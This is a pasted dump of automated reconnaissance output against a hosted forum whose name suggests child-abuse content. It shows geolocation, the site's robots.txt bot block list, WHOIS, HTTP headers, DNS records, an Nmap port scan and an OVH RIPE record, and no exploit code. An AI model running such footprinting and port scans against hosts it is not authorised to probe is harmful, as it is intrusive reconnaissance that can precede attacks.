· 8 years ago · Nov 30, 2017, 06:54 AM
1#######################################################################################################################################
2Nom de l'hôte pedoforums.omgforum.net FAI OVH S (AS16276)
3Continent Europe Drapeau
4IE
5Pays Irlande Code du pays IE (IRL)
6Région Inconnu Heure locale 30 Nov 2017 04:28 GMT
7Ville Inconnu Latitude 53.347
8Adresse IP 188.165.2.137 Longitude -6.244
9#######################################################################################################################################
10[i] Scanning Site: http://pedoforums.omgforum.net
11
12
13
14B A S I C I N F O
15====================
16
17
18[+] Site Title: Free forum : welcome to pedo forum's!
19[+] IP address: 178.33.43.178
20[+] Web Server: Could Not Detect
21[+] CMS: Could Not Detect
22[+] Cloudflare: Not Detected
23[+] Robots File: Found
24
25-------------[ contents ]----------------
26User-agent: Mediapartners-Google
27Disallow:
28
29User-agent: Mediapartners-Google*
30Disallow:
31
32User-agent: *
33Disallow: /abuse
34Disallow: /admgt/
35Disallow: /contact
36Disallow: /donate
37Disallow: /go/
38Disallow: /login
39Disallow: /modcp
40Disallow: /post
41Disallow: /privmsg
42Disallow: /spa/
43Disallow: /sta/
44Disallow: /bw
45
46User-agent: 008
47User-agent: Accoona
48User-agent: aipbot
49User-agent: aipbot*
50User-agent: aipbot/1.0
51User-agent: Alexa
52User-agent: Alexa Bitlybot
53User-agent: Alexibot
54User-agent: AltaVista Intranet V2.0 AVS EVAL search@freeit.com
55User-agent: AltaVista Intranet V2.0 Compaq Altavista Eval sveand@altavista.net
56User-agent: AltaVista Intranet V2.0 evreka.com crawler@evreka.com
57User-agent: AltaVista V2.0B crawler@evreka.com
58User-agent: Anonymous
59User-agent: ApocalXExplorerBot
60User-agent: appie
61User-agent: Aqua_Products
62User-agent: Argus/1.1
63User-agent: Artabus
64User-agent: Ask Jeeves
65User-agent: asterias
66User-agent: atSpider
67User-agent: attentio
68User-agent: AV Fetch 1.0
69User-agent: AVSearch-3.0(AltaVista/AVC)
70User-agent: AWS Cloud Based
71User-agent: b2w
72User-agent: b2w/0.1
73User-agent: BackDoorBot
74User-agent: BackDoorBot/1.0
75User-agent: BacklinkCrawler
76User-agent: becomebot
77User-agent: BecomeBot
78User-agent: BigBrother
79User-agent: BIGLOTRON (BETA 2;GNU/Linux)
80User-agent: BizInformation
81User-agent: Black Hole
82User-agent: Black.Hole
83User-agent: BlackWidow
84User-agent: BlowFish
85User-agent: BlowFish/1.0
86User-agent: BoardPulse
87User-agent: boitho.com-dc
88User-agent: Bookmark search tool
89User-agent: bot/1.0
90User-agent: BotALot
91User-agent: Bot mailto:craftbot@yahoo.com
92User-agent: BotRightHere
93User-agent: BrandProtect
94User-agent: BuiltBotTough
95User-agent: Bullseye
96User-agent: Bullseye/1.0
97User-agent: BunnySlippers
98User-agent: CazoodleBot
99User-agent: Cegbfeieh
100User-agent: cfetch
101User-agent: cfetch/1.0
102User-agent: CheeseBot
103User-agent: CherryPicker
104User-agent: CherryPicker /1.0
105User-agent: CherryPickerElite/1.0
106User-agent: CherryPickerSE/1.0
107User-agent: ChinaClaw
108User-agent: Collage
109User-agent: cometrics-bot
110User-agent: complex_network_group
111User-agent: convera
112User-agent: ConveraCrawler
113User-agent: ConveraCrawler/0.2
114User-agent: ConveraCrawler/0.9d
115User-agent: Convera Internet Spider V6.x
116User-agent: ConveraMultiMediaCrawler/0.1
117User-agent: Copernic
118User-agent: CopyRightCheck
119User-agent: cosmos
120User-agent: Crescent
121User-agent: Crescent Internet ToolPak HTTP OLE Control v.1.0
122User-agent: Crescent Internet ToolPak HTTPOLE Control v.1.0
123User-agent: Curl
124User-agent: Custo
125User-agent: CydralSpider
126User-agent: Deepnet Explorer
127User-agent: default.ida
128User-agent: DigExt
129User-agent: DISCo
130User-agent: discobot
131User-agent: DISCoFinder
132User-agent: DISCo Pump
133User-agent: DISCo Pump 3.0
134User-agent: DISCo Pump 3.1
135User-agent: DISCo Pump 3.2
136User-agent: DittoSpyder
137User-agent: DOC
138User-agent: dotbot
139User-agent: DotBot
140User-agent: DotBot/1.1
141User-agent: Download Demon
142User-agent: Download Demon/3.2.0.8
143User-agent: Download Demon/3.5.0.11
144User-agent: Download Ninja
145User-agent: Download Wonder
146User-agent: DSurf
147User-agent: Dulance bot
148User-agent: dumbot
149User-agent: eCatch
150User-agent: eCatch/3.0
151User-agent: echo!
152User-agent: EchO!/2.0
153User-agent: EirGrabber
154User-agent: EliteSys Entry
155User-agent: EmailCollector
156User-agent: Email Extractor
157User-agent: EmailSiphon
158User-agent: EmailSmartz
159User-agent: EmailWolf
160User-agent: Enterprise_Search
161User-agent: Enterprise_Search/1.0
162User-agent: EroCrawler
163User-agent: es
164User-agent: ESIRover
165User-agent: e-SocietyRobot
166User-agent: Exabot
167User-agent: Exabot/2.0
168User-agent: Exabot-Images
169User-agent: Express WebPictures
170User-agent: Express WebPictures (www.express-soft.com)
171User-agent: ExtractorPro
172User-agent: EyeNetIE
173User-agent: FairAd Client
174User-agent: Fairshare
175User-agent: Fasterfox
176User-agent: Fetch
177User-agent: findlinks
178User-agent: Flaming AttackBot
179User-agent: Flamingo_SearchEngine
180User-agent: FlashGet
181User-agent: FlashGet WebWasher 3.2
182User-agent: Foobot
183User-agent: FreeFind
184User-agent: FreeWebMonitoring SiteChecker/0.1
185User-agent: FrontPage
186User-agent: FrontPage [NC,OR]
187User-agent: FurlBot
188User-agent: Gaisbot
189User-agent: Gaisbot/3.0
190User-agent: GetBot
191User-agent: GetRight
192User-agent: GetRight/2.11
193User-agent: GetRight/3.1
194User-agent: GetRight/3.2
195User-agent: GetRight/3.3
196User-agent: GetRight/3.3.3
197User-agent: GetRight/3.3.4
198User-agent: GetRight/4.0.0
199User-agent: GetRight/4.1.0
200User-agent: GetRight/4.1.1
201User-agent: GetRight/4.1.2
202User-agent: GetRight/4.2
203User-agent: GetRight/4.2b (Portuguxeas)
204User-agent: GetRight/4.2c
205User-agent: GetRight/4.3
206User-agent: GetRight/4.5
207User-agent: GetRight/4.5a
208User-agent: GetRight/4.5b
209User-agent: GetRight/4.5b1
210User-agent: GetRight/4.5b2
211User-agent: GetRight/4.5b3
212User-agent: GetRight/4.5b6
213User-agent: GetRight/4.5b7
214User-agent: GetRight/4.5c
215User-agent: GetRight/4.5d
216User-agent: GetRight/4.5e
217User-agent: GetRight/5.0beta1
218User-agent: GetRight/5.0beta2
219User-agent: GetUrl
220User-agent: GetWeb!
221User-agent: Gigabot
222User-agent: Gigabot/3.0
223User-agent: Go-Ahead-Got-It
224User-agent: Go!Zilla
225User-agent: Go!Zilla 3.3 (www.gozilla.com)
226User-agent: Go!Zilla 3.5 (www.gozilla.com)
227User-agent: Go!Zilla (www.gozilla.com)
228User-agent: GrabNet
229User-agent: Grafula
230User-agent: grub
231User-agent: grub-client
232User-agent: Hackertarget.com
233User-agent: Harvest
234User-agent: Harvest/1.5
235User-agent: Hatena Antenna
236User-agent: HavIndex
237User-agent: heritrix
238User-agent: hloader
239User-agent: HMView
240User-agent: httplib
241User-agent: httrack
242User-agent: HTTrack
243User-agent: HTTrack 3.0
244User-agent: HTTrack 3.0x
245User-agent: HTTrack [NC,OR]
246User-agent: humanlinks
247User-agent: ichiro
248User-agent: IconSurf
249User-agent: Igentia
250User-agent: Image Collector
251User-agent: Image Stripper
252User-agent: Image Sucker
253User-agent: Indy Library
254User-agent: Indy Library [NC,OR]
255User-agent: InfoNaviRobot
256User-agent: InfoSpiders
257User-agent: InterGET
258User-agent: Internet Explore
259User-agent: Internet Ninja
260User-agent: Internet Ninja 4.0
261User-agent: Internet Ninja 5.0
262User-agent: Internet Ninja 6.0
263User-agent: InternetSupervision
264User-agent: IRLbot
265User-agent: Iron
266User-agent: Iron33/1.0.2
267User-agent: Jeeves
268User-agent: JennyBot
269User-agent: Jetbot
270User-agent: Jetbot/1.0
271User-agent: JetCar
272User-agent: Jobo
273User-agent: JOC Web Spider
274User-agent: kalooga
275User-agent: KDD Exploror
276User-agent: Kenjin Spider
277User-agent: Kenjin.Spider
278User-agent: Keyword Density
279User-agent: Keyword.Density
280User-agent: Keyword Density/0.9
281User-agent: larbin
282User-agent: Larbin
283User-agent: larbin_2.6.2 (kabura@sushi.com)
284User-agent: larbin_2.6.2 kabura@sushi.com
285User-agent: larbin_2.6.2 (larbin2.6.2@unspecified.mail)
286User-agent: larbin_2.6.2 larbin2.6.2@unspecified.mail
287User-agent: larbin_2.6.2 larbin@correa.org
288User-agent: larbin_2.6.2 listonATccDOTgatechDOTedu
289User-agent: larbin_2.6.2 (listonATccDOTgatechDOTedu)
290User-agent: larbin_2.6.2 (vitalbox1@hotmail.com)
291User-agent: larbin_2.6.2 vitalbox1@hotmail.com
292User-agent: larbin (samualt9@bigfoot.com)
293User-agent: larbin samualt9@bigfoot.com
294User-agent: LBot
295User-agent: LeechFTP
296User-agent: LexiBot
297User-agent: libWeb/clsHTTP
298User-agent: libWeb/clsHTTPDisallow: /
299User-agent: libwww
300User-agent: LightningDownload
301User-agent: Linguee
302User-agent: LinkedIn
303User-agent: LinkextractorPro
304User-agent: Linknzbot
305User-agent: Linknzbot*
306User-agent: Linknzbot 2004
307User-agent: LinkScan
308User-agent: LinkScan/8.1a Unix
309User-agent: LinkScan/8.1a.Unix
310User-agent: LinkScan/8.1a Unix Disallow: /
311User-agent: linksmanager
312User-agent: LinksManager
313User-agent: LinksManager.com_bot
314User-agent: LinkWalker
315User-agent: LjSEEK
316User-agent: LNSpiderguy
317User-agent: looksmart
318User-agent: LWP
319User-agent: LWP*
320User-agent: lwp-trivial
321User-agent: lwp-trivial/1.34
322User-agent: magpie-crawler
323User-agent: Mail Sweeper
324User-agent: Marketwirebot
325User-agent: Mass Downloader
326User-agent: Mass Downloader/2.2
327User-agent: Mata Hari
328User-agent: Mata.Hari
329User-agent: MegaIndex.ru
330User-agent: MegaIndex.ru/2.0
331User-agent: MetagerBot
332User-agent: MetaURI
333User-agent: Microsoft.URL
334User-agent: Microsoft URL Control
335User-agent: Microsoft URL Control*
336User-agent: Microsoft.URL.Control
337User-agent: Microsoft URL Control - 5.01.4511
338User-agent: Microsoft URL Control - 6.00.8169
339User-agent: Microsoft URL Control - 6.01.9782
340User-agent: MIDown tool
341User-agent: MIIxpc
342User-agent: MIIxpc/4.2
343User-agent: Missigua Locator
344User-agent: Mister PiX
345User-agent: Mister.PiX
346User-agent: Mister Pix II 2.01
347User-agent: Mister Pix II 2.02a
348User-agent: Mister PiX version.dll
349User-agent: MLBot
350User-agent: moget
351User-agent: moget/2.1
352User-agent: mozilla
353User-agent: Mozilla
354User-agent: Mozilla/2.0 (compatible; Ask Jeeves)
355User-agent: mozilla/3
356User-agent: mozilla/4
357User-agent: Mozilla/4.0 (compatible; BullsEye; Windows 95)
358User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 2000)
359User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
360User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)
361User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows ME)
362User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows NT)
363User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows XP)
364User-agent: mozilla/5
365User-agent: MRSPUTNIK
366User-agent: MSIECrawler
367User-agent: MSRBOT
368User-agent: MS Search 4.0 Robot
369User-agent: MS Search 5.0 Robot
370User-agent: munky
371User-agent: naver
372User-agent: Naverbot
373User-agent: NaverBot
374User-agent: NaverBot-1.0
375User-agent: Navroad
376User-agent: NearSite
377User-agent: NetAnts
378User-agent: NetAnts/1.10
379User-agent: NetAnts/1.23
380User-agent: NetAnts/1.24
381User-agent: NetAnts/1.25
382User-agent: NetAttache
383User-agent: NetAttache Light 1.1
384User-agent: Netcraft Web Server Survey
385User-agent: NetMechanic
386User-agent: NetSpider
387User-agent: Net Vampire
388User-agent: Net Vampire/3.0
389User-agent: NetZIP
390User-agent: NetZip-Downloader
391User-agent: NetZip-Downloader/1.0.62 (Win32; Dec 7 1998)
392User-agent: NetZip Downloader 1.0 Win32(Nov 12 1998)
393User-agent: NetZippy+(http://www.innerprise.net/usp-spider.asp)
394User-agent: NetZippy+(http:/www.innerprise.net/usp-spider.asp)
395User-agent: NICErsPRO
396User-agent: NimbleCrawler
397User-agent: NPbot
398User-agent: NPBot
399User-agent: NPBot/3
400User-agent: Nutch
401User-agent: Nutch*
402User-agent: NutchCVS/0.06-dev
403User-agent: NutchCVS/0.7.1
404User-agent: NutchOrg
405User-agent: oBot
406User-agent: Ocelli
407User-agent: Octopus
408User-agent: Offline Explorer
409User-agent: Offline.Explorer
410User-agent: Offline Explorer/1.2
411User-agent: Offline Explorer/1.4
412User-agent: Offline Explorer/1.6
413User-agent: Offline Explorer/1.7
414User-agent: Offline Explorer/1.9
415User-agent: Offline Explorer/2.0
416User-agent: Offline Explorer/2.1
417User-agent: Offline Explorer/2.3
418User-agent: Offline Explorer/2.4
419User-agent: Offline Explorer/2.5
420User-agent: Offline Navigator
421User-agent: OmniExplorer_Bot
422User-agent: oneriot
423User-agent: Openbot
424User-agent: Openfind
425User-agent: Openfind data gathere
426User-agent: Openfind data gatherer
427User-agent: Oracle Ultra Search
428User-agent: OutfoxBot/0.5
429User-agent: PageGrabber
430User-agent: Papa Foto
431User-agent: pavuk
432User-agent: PBWF
433User-agent: pcBrowser
434User-agent: penthesilea
435User-agent: PerMan
436User-agent: PGBot
437User-agent: PhpDig
438User-agent: Pingdom GIGRIB (http://www.pingdom.com)
439User-agent: postrank
440User-agent: ProPowerBot
441User-agent: ProPowerBot/2.14
442User-agent: ProWebWalker
443User-agent: psbot
444User-agent: psycheclone
445User-agent: Psycheclone
446User-agent: Python-urllib
447User-agent: QuepasaCreep
448User-agent: QueryN Metasearch
449User-agent: QueryN.Metasearch
450User-agent: radian6 comment reader
451User-agent: radian6 Feedfetcher
452User-agent: Radiation Retriever
453User-agent: Radiation Retriever 1.1
454User-agent: RB2B-bot
455User-agent: RealDownload
456User-agent: RealDownload/4.0.0.40
457User-agent: RealDownload/4.0.0.41
458User-agent: RealDownload/4.0.0.42
459User-agent: ReGet
460User-agent: RepoMonkey
461User-agent: RepoMonkey Bait & Tackle/v1.01
462User-agent: RepoMonkey Bait & Tackle
463User-agent: RepoMonkey Bait & Tackle/v1.01
464User-agent: research-spider
465User-agent: RMA
466User-agent: Robozilla
467User-agent: Roverbot
468User-agent: RufusBot
469User-agent: sbider
470User-agent: Scooter/1.0
471User-agent: Scooter/1.0 scooter@pa.dec.com
472User-agent: Scooter/1.1 (custom)
473User-agent: Scooter/2.0 G.R.A.B. V1.1.0
474User-agent: Scooter/2.0 G.R.A.B. X2.0
475User-agent: Scooter2_Mercator_x-x.0
476User-agent: Scooter-3.0.EU
477User-agent: Scooter-3.0.FS
478User-agent: Scooter-3.0.HD
479User-agent: Scooter-3.0QI
480User-agent: Scooter-3.0.VNS
481User-agent: Scooter-3.2
482User-agent: Scooter-3.2.BT
483User-agent: Scooter-3.2.DIL
484User-agent: Scooter-3.2.EX
485User-agent: Scooter-3.2.JT
486User-agent: Scooter-3.2.NIV
487User-agent: Scooter-3.2.SF0
488User-agent: Scooter-3.2.snippet
489User-agent: Scooter/3.3
490User-agent: Scooter-3.3dev
491User-agent: Scooter/3.3.QA.pczukor
492User-agent: Scooter/3.3_SF
493User-agent: Scooter/3.3.vscooter
494User-agent: Scooter-ARS-1.1
495User-agent: Scooter-ARS-1.1-ih
496User-agent: Scooter_bh0-3.0.3
497User-agent: Scooter_trk3-3.0.3
498User-agent: scooter-venus-3.0.vns
499User-agent: Scooter-W3-1.0
500User-agent: Scooter-W3.1.2
501User-agent: Scrubby
502User-agent: SearchDaimon.com-dc
503User-agent: searchpreview
504User-agent: semalt.com
505User-agent: seekbot
506User-agent: Seekbot
507User-agent: Seekbot/1.0
508User-agent: SEOprofiler
509User-agent: Shai'Hulud
510User-agent: Shim-Crawler
511User-agent: ShopWiki
512User-agent: ShopWiki/1.0
513User-agent: SightupBot
514User-agent: SiteBot
515User-agent: SiteSnagger
516User-agent: Slurp China
517User-agent: SlySearch
518User-agent: SmartDownload
519User-agent: SmartDownload/1.2.76 (Win32; Apr 1 1999)
520User-agent: SmartDownload/1.2.77 (Win32; Aug 17 1999)
521User-agent: SmartDownload/1.2.77 (Win32; Feb 1 2000)
522User-agent: SmartDownload/1.2.77 (Win32; Jun 19 2001)
523User-agent: Snapbot
524User-agent: Snappy
525User-agent: Softlayer Server
526User-agent: Sogou web spider
527User-agent: sootle
528User-agent: sosospider
529User-agent: SpankBot
530User-agent: spanner
531User-agent: spbot
532User-agent: Speedy
533User-agent: SpiderBot
534User-agent: Sqworm
535User-agent: Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux
536User-agent: ssearcher100
537User-agent: Stanford
538User-agent: Stanford Comp Sci
539User-agent: suggybot
540User-agent: SuperBot
541User-agent: SuperBot/2.6
542User-agent: SuperBot/3.0 (Win32)
543User-agent: SuperBot/3.1 (Win32)
544User-agent: SuperHTTP
545User-agent: SuperHTTP/1.0
546User-agent: Surfbot
547User-agent: SurveyBot
548User-agent: suzuran
549User-agent: Szukacz
550User-agent: Szukacz/1.4
551User-agent: tAkeOut
552User-agent: Teleport
553User-agent: TeleportPro
554User-agent: Teleport Pro
555User-agent: Teleport Pro/1.29
556User-agent: Teleport Pro/1.29.1590
557User-agent: Teleport Pro/1.29.1634
558User-agent: Teleport Pro/1.29.1718
559User-agent: Teleport Pro/1.29.1820
560User-agent: Teleport Pro/1.29.1847
561User-agent: Telesoft
562User-agent: Templeton
563User-agent: Teoma
564User-agent: The Intraformant
565User-agent: The.Intraformant
566User-agent: TheNomad
567User-agent: TightTwatBot
568User-agent: Titan
569User-agent: toCrawl
570User-agent: toCrawl/UrlDispatcher
571User-agent: True_Robot
572User-agent: True_Robot/1.0
573User-agent: turingos
574User-agent: TurnitinBot
575User-agent: TurnitinBot/1.5
576User-agent: Tweetmeme
577User-agent: TwengaBot
578User-agent: Twiceler
579User-agent: URL Control
580User-agent: UrlDispatcher
581User-agent: ://URLFAN
582User-agent: URL_Spider_Pro
583User-agent: URLy Warning
584User-agent: URLy.Warning
585User-agent: VCI
586User-agent: VCI WebViewer VCI WebViewer Win32
587User-agent: vobsub
588User-agent: VoidEYE
589User-agent: vscooter
590User-agent: w3mir
591User-agent: WatchDog/3.0
592User-agent: WebAuto
593User-agent: WebAuto/3.40 (Win98; I)
594User-agent: WebBandit
595User-agent: WebBandit/3.50
596User-agent: WebCapture
597User-agent: WebCapture 2.0
598User-agent: WebCatcher
599User-agent: webcopier
600User-agent: WebCopier
601User-agent: WebCopier v.2.2
602User-agent: WebCopier v2.5
603User-agent: WebCopier v2.6
604User-agent: WebCopier v2.7a
605User-agent: WebCopier v2.8
606User-agent: WebCopier v3.0
607User-agent: WebCopier v3.0.1
608User-agent: WebCopier v3.2
609User-agent: WebCopier v3.2a
610User-agent: webcopy
611User-agent: WebCopy
612User-agent: webcrawl.net
613User-agent: WebEmailExtrac
614User-agent: WebEMailExtrac.*
615User-agent: WebEnhancer
616User-agent: WebFetch
617User-agent: webfetch/2.1.0
618User-agent: WebFetcher
619User-agent: WebGo IS
620User-agent: Web Image Collector
621User-agent: Web.Image.Collector
622User-agent: WebLeacher
623User-agent: WebmasterWorld Extractor
624User-agent: WebmasterWorldForumBot
625User-agent: webmirror
626User-agent: WebMirror
627User-agent: WebReaper
628User-agent: Web Reaper
629User-agent: WebReaper [info@webreaper.net]
630User-agent: WebReaper v9.1 - www.otway.com/webreaper
631User-agent: WebReaper v9.7 - www.webreaper.net
632User-agent: WebReaper v9.8 - www.webreaper.net
633User-agent: WebReaper vWebReaper v7.3 - www,otway.com/webreaper
634User-agent: WebReaper [webreaper@otway.com]
635User-agent: WebSauger
636User-agent: WebSauger 1.20b
637User-agent: WebSauger 1.20j
638User-agent: WebSauger 1.20k
639User-agent: website extractor
640User-agent: Website eXtractor
641User-agent: Website eXtractor (http:/www.asona.org)
642User-agent: Website Quester
643User-agent: Website.Quester
644User-agent: Website Quester - www.asona.org
645User-agent: Website Quester - www.esalesbiz.com/extra/
646User-agent: Webster Pro
647User-agent: Webster.Pro
648User-agent: WebStripper
649User-agent: WebStripper/2.02
650User-agent: WebStripper/2.03
651User-agent: WebStripper/2.10
652User-agent: WebStripper/2.12
653User-agent: WebStripper/2.13
654User-agent: WebStripper/2.15
655User-agent: WebStripper/2.16
656User-agent: WebStripper/2.19
657User-agent: Web Sucker
658User-agent: webvac
659User-agent: WebVac
660User-agent: WebVulnCrawl
661User-agent: WebVulnScan
662User-agent: WebWalk
663User-agent: WebWasher
664User-agent: WebWhacker
665User-agent: WebZip
666User-agent: WebZIP
667User-agent: WebZIP/2.75 (http://www.spidersoft.com)
668User-agent: WebZIP/2.75 (http:/www.spidersoft.com)
669User-agent: WebZIP/3.65 (http://www.spidersoft.com)
670User-agent: WebZIP/3.65 (http:/www.spidersoft.com)
671User-agent: WebZIP/3.80 (http://www.spidersoft.com)
672User-agent: WebZIP/3.80 (http:/www.spidersoft.com)
673User-agent: WebZip/4.0
674User-agent: WebZIP/4.0 (http://www.spidersoft.com)
675User-agent: WebZIP/4.0 (http:/www.spidersoft.com)
676User-agent: WebZIP/4.1 (http://www.spidersoft.com)
677User-agent: WebZIP/4.1 (http:/www.spidersoft.com)
678User-agent: WebZIP/4.21
679User-agent: WebZIP/4.21 (http://www.spidersoft.com)
680User-agent: WebZIP/4.21 (http:/www.spidersoft.com)
681User-agent: WebZIP/5.0
682User-agent: WebZIP/5.0 (http://www.spidersoft.com)
683User-agent: WebZIP/5.0 (http:/www.spidersoft.com)
684User-agent: WebZIP/5.0 PR1 (http://www.spidersoft.com)
685User-agent: WebZIP/5.0 PR1 (http:/www.spidersoft.com)
686User-agent: wget
687User-agent: wGet
688User-agent: Wget
689User-agent: Wget/1.10.2
690User-agent: Wget/1.5.2
691User-agent: Wget/1.5.3
692User-agent: Wget/1.6
693User-agent: Wget/1.7
694User-agent: Wget/1.8
695User-agent: Wget/1.8.1
696User-agent: Wget/1.8.1+cvs
697User-agent: Wget/1.8.2
698User-agent: Wget/1.9-beta
699User-agent: whitevector crawler
700User-agent: Whitevector+Crawler
701User-agent: Widow
702User-agent: WikioFeedBot
703User-agent: wikiwix-bot-3.0
704User-agent: Willow
705User-agent: WinHTTrack
706User-agent: Wise-Guys
707User-agent: woozweb-monitoring
708User-agent: woriobot
709User-agent: WWW-Collector
710User-agent: WWW-Collector-E
711User-agent: WWWOFFLE
712User-agent: Xaldon WebSpider
713User-agent: Xaldon WebSpider 2.5.b3
714User-agent: Xenu
715User-agent: Xenu Link Sleuth
716User-agent: Xenu's
717User-agent: Xenu's Link Sleuth 1.1c
718User-agent: xGet
719User-agent: Yahoo-MMCrawler
720User-agent: YahooSeeker/CafeKelsa
721User-agent: Yeti
722User-agent: YodaoBot
723User-agent: YRSPider
724User-agent: Zao
725User-agent: Zealbot
726User-agent: Zeus
727User-agent: Zeus 11389 Webster Pro V2.9 Win32
728User-agent: Zeus 11652 Webster Pro V2.9 Win32
729User-agent: Zeus 18018 Webster Pro V2.9 Win32
730User-agent: Zeus 26378 Webster Pro V2.9 Win32
731User-agent: Zeus 30747 Webster Pro V2.9 Win32
732User-agent: Zeus 32297 Webster Pro V2.9 Win32
733User-agent: Zeus 39206 Webster Pro V2.9 Win32
734User-agent: Zeus 41641 Webster Pro V2.9 Win32
735User-agent: Zeus 44238 Webster Pro V2.9 Win32
736User-agent: Zeus 51070 Webster Pro V2.9 Win32
737User-agent: Zeus 51674 Webster Pro V2.9 Win32
738User-agent: Zeus 51837 Webster Pro V2.9 Win32
739User-agent: Zeus 63567 Webster Pro V2.9 Win32
740User-agent: Zeus 6694 Webster Pro V2.9 Win32
741User-agent: Zeus 71129 Webster Pro V2.9 Win32
742User-agent: Zeus 82016 Webster Pro V2.9 Win32
743User-agent: Zeus 82900 Webster Pro V2.9 Win32
744User-agent: Zeus 84842 Webster Pro V2.9 Win32
745User-agent: Zeus 90872 Webster Pro V2.9 Win32
746User-agent: Zeus 94934 Webster Pro V2.9 Win32
747User-agent: Zeus 95245 Webster Pro V2.9 Win32
748User-agent: Zeus 95351 Webster Pro V2.9 Win32
749User-agent: Zeus 97371 Webster Pro V2.9 Win32
750User-agent: Zeus Link Scout
751User-agent: ZyBorg
752Disallow: /
753
754User-agent: AhrefsBot
755User-agent: SemrushBot
756User-agent: Sogou web spider
757User-agent: sogou spider
758User-agent: MJ12bot
759User-agent: MJ12bot/v1.4.3
760Crawl-delay: 2
761
762Sitemap: http://pedoforums.omgforum.net/sitemap.xml
763
764-----------[end of contents]-------------
765
766
767
768W H O I S L O O K U P
769========================
770
771 No match for "PEDOFORUMS.OMGFORUM.NET".
772>>> Last update of whois database: 2017-11-30T04:31:57Z <<<
773
774NOTICE: The expiration date displayed in this record is the date the
775registrar's sponsorship of the domain name registration in the registry is
776currently set to expire. This date does not necessarily reflect the expiration
777date of the domain name registrant's agreement with the sponsoring
778registrar. Users may consult the sponsoring registrar's Whois database to
779view the registrar's reported date of expiration for this registration.
780
781
782The Registry database contains ONLY .COM, .NET, .EDU domains and
783Registrars.
784
785
786
787
788G E O I P L O O K U P
789=========================
790
791[i] IP Address: 94.23.150.222
792[i] Country: NL
793[i] State: N/A
794[i] City: N/A
795[i] Latitude: 52.382401
796[i] Longitude: 4.899500
797
798
799
800
801H T T P H E A D E R S
802=======================
803
804
805[i] HTTP/1.1 200 OK
806[i] Date: Thu, 30 Nov 2017 04:32:33 GMT
807[i] Content-Type: text/html; charset=iso-8859-1
808[i] Connection: close
809[i] P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
810[i] Cache-Control: no-cache, no-store
811[i] Pragma: no-cache
812[i] Expires: Thu, 30 Nov 2017 00:00:00 GMT
813[i] Last-Modified: Thu, 30 Nov 2017 04:32:33 GMT
814[i] Vary: User-Agent
815[i] Set-Cookie: exadd=151205; expires=Thu, 30-Nov-2017 16:32:33 GMT; Max-Age=43200
816[i] X-Content-Type-Options: nosniff
817[i] X-XSS-Protection: 1; mode=block
818[i] Access-Control-Allow-Origin: *
819
820
821
822
823D N S L O O K U P
824===================
825
826pedoforums.omgforum.net. 21599 IN CNAME q50.maxns.net.
827
828
829
830
831S U B N E T C A L C U L A T I O N
832====================================
833
834Address = 94.23.159.185
835Network = 94.23.159.185 / 32
836Netmask = 255.255.255.255
837Broadcast = not needed on Point-to-Point links
838Wildcard Mask = 0.0.0.0
839Hosts Bits = 0
840Max. Hosts = 1 (2^0 - 0)
841Host Range = { 94.23.159.185 - 94.23.159.185 }
842
843
844
845N M A P P O R T S C A N
846============================
847
848
849Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-30 04:33 UTC
850Nmap scan report for pedoforums.omgforum.net (94.23.159.185)
851Host is up (0.083s latency).
852Other addresses for pedoforums.omgforum.net (not scanned): 178.33.43.150 94.23.73.212 94.23.76.111 178.33.44.177 178.33.43.178 94.23.150.222 178.33.115.32 188.165.2.137
853PORT STATE SERVICE VERSION
85421/tcp filtered ftp
85522/tcp filtered ssh
85623/tcp filtered telnet
85725/tcp open smtp Postfix smtpd
85880/tcp open http?
859110/tcp closed pop3
860143/tcp closed imap
861443/tcp open ssl/https?
862445/tcp filtered microsoft-ds
8633389/tcp filtered ms-wbt-server
864
865Service Info: Host: ns374338.ip-151-80-18.eu
866
867Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
868Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
869
870% This is the RIPE Database query service.
871% The objects are in RPSL format.
872%
873% The RIPE Database is subject to Terms and Conditions.
874% See http://www.ripe.net/db/support/db-terms-conditions.pdf
875
876% Note: this output has been filtered.
877% To receive output for a database update, use the "-B" flag.
878
879% Information related to '188.165.0.0 - 188.165.7.255'
880
881% Abuse contact for '188.165.0.0 - 188.165.7.255' is 'abuse@ovh.net'
882
883inetnum: 188.165.0.0 - 188.165.7.255
884netname: IE-OVH
885descr: OVH Hosting Limited
886country: IE
887org: ORG-OH5-RIPE
888admin-c: OTC9-RIPE
889tech-c: OTC9-RIPE
890status: ASSIGNED PA
891remarks: INFRA-AW
892mnt-by: OVH-MNT
893created: 2016-09-29T10:45:44Z
894last-modified: 2016-09-29T10:45:44Z
895source: RIPE
896
897organisation: ORG-OH5-RIPE
898org-name: OVH Hosting Limited
899org-type: OTHER
900address: 5 Fitzwilliam Place
901address: Dublin 2
902address: Ireland
903mnt-ref: OVH-MNT
904mnt-by: OVH-MNT
905created: 2009-09-16T15:41:10Z
906last-modified: 2017-10-30T16:13:19Z
907source: RIPE # Filtered
908
909role: OVH IE Technical Contact
910address: OVH Hosting Limited
911address: 5 Fitzwilliam Place
912address: Dublin 2
913address: Ireland
914admin-c: OK217-RIPE
915tech-c: GM84-RIPE
916nic-hdl: OTC9-RIPE
917abuse-mailbox: abuse@ovh.net
918mnt-by: OVH-MNT
919created: 2009-09-16T15:41:10Z
920last-modified: 2009-09-16T15:41:10Z
921source: RIPE # Filtered
922
923% Information related to '188.165.0.0/16AS16276'
924
925route: 188.165.0.0/16
926descr: OVH ISP
927descr: Paris, France
928origin: AS16276
929mnt-by: OVH-MNT
930created: 2009-06-08T16:23:41Z
931last-modified: 2009-06-08T16:23:41Z
932source: RIPE # Filtered
933
934% This query was served by the RIPE Database Query Service version 1.90 (BLAARKOP)
935[92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
936Server: 2001:568:ff09:10c::53
937Address: 2001:568:ff09:10c::53#53
938
939Non-authoritative answer:
940pedoforums.omgforum.net canonical name = q50.maxns.net.
941Name: q50.maxns.net
942Address: 178.33.43.150
943Name: q50.maxns.net
944Address: 94.23.150.222
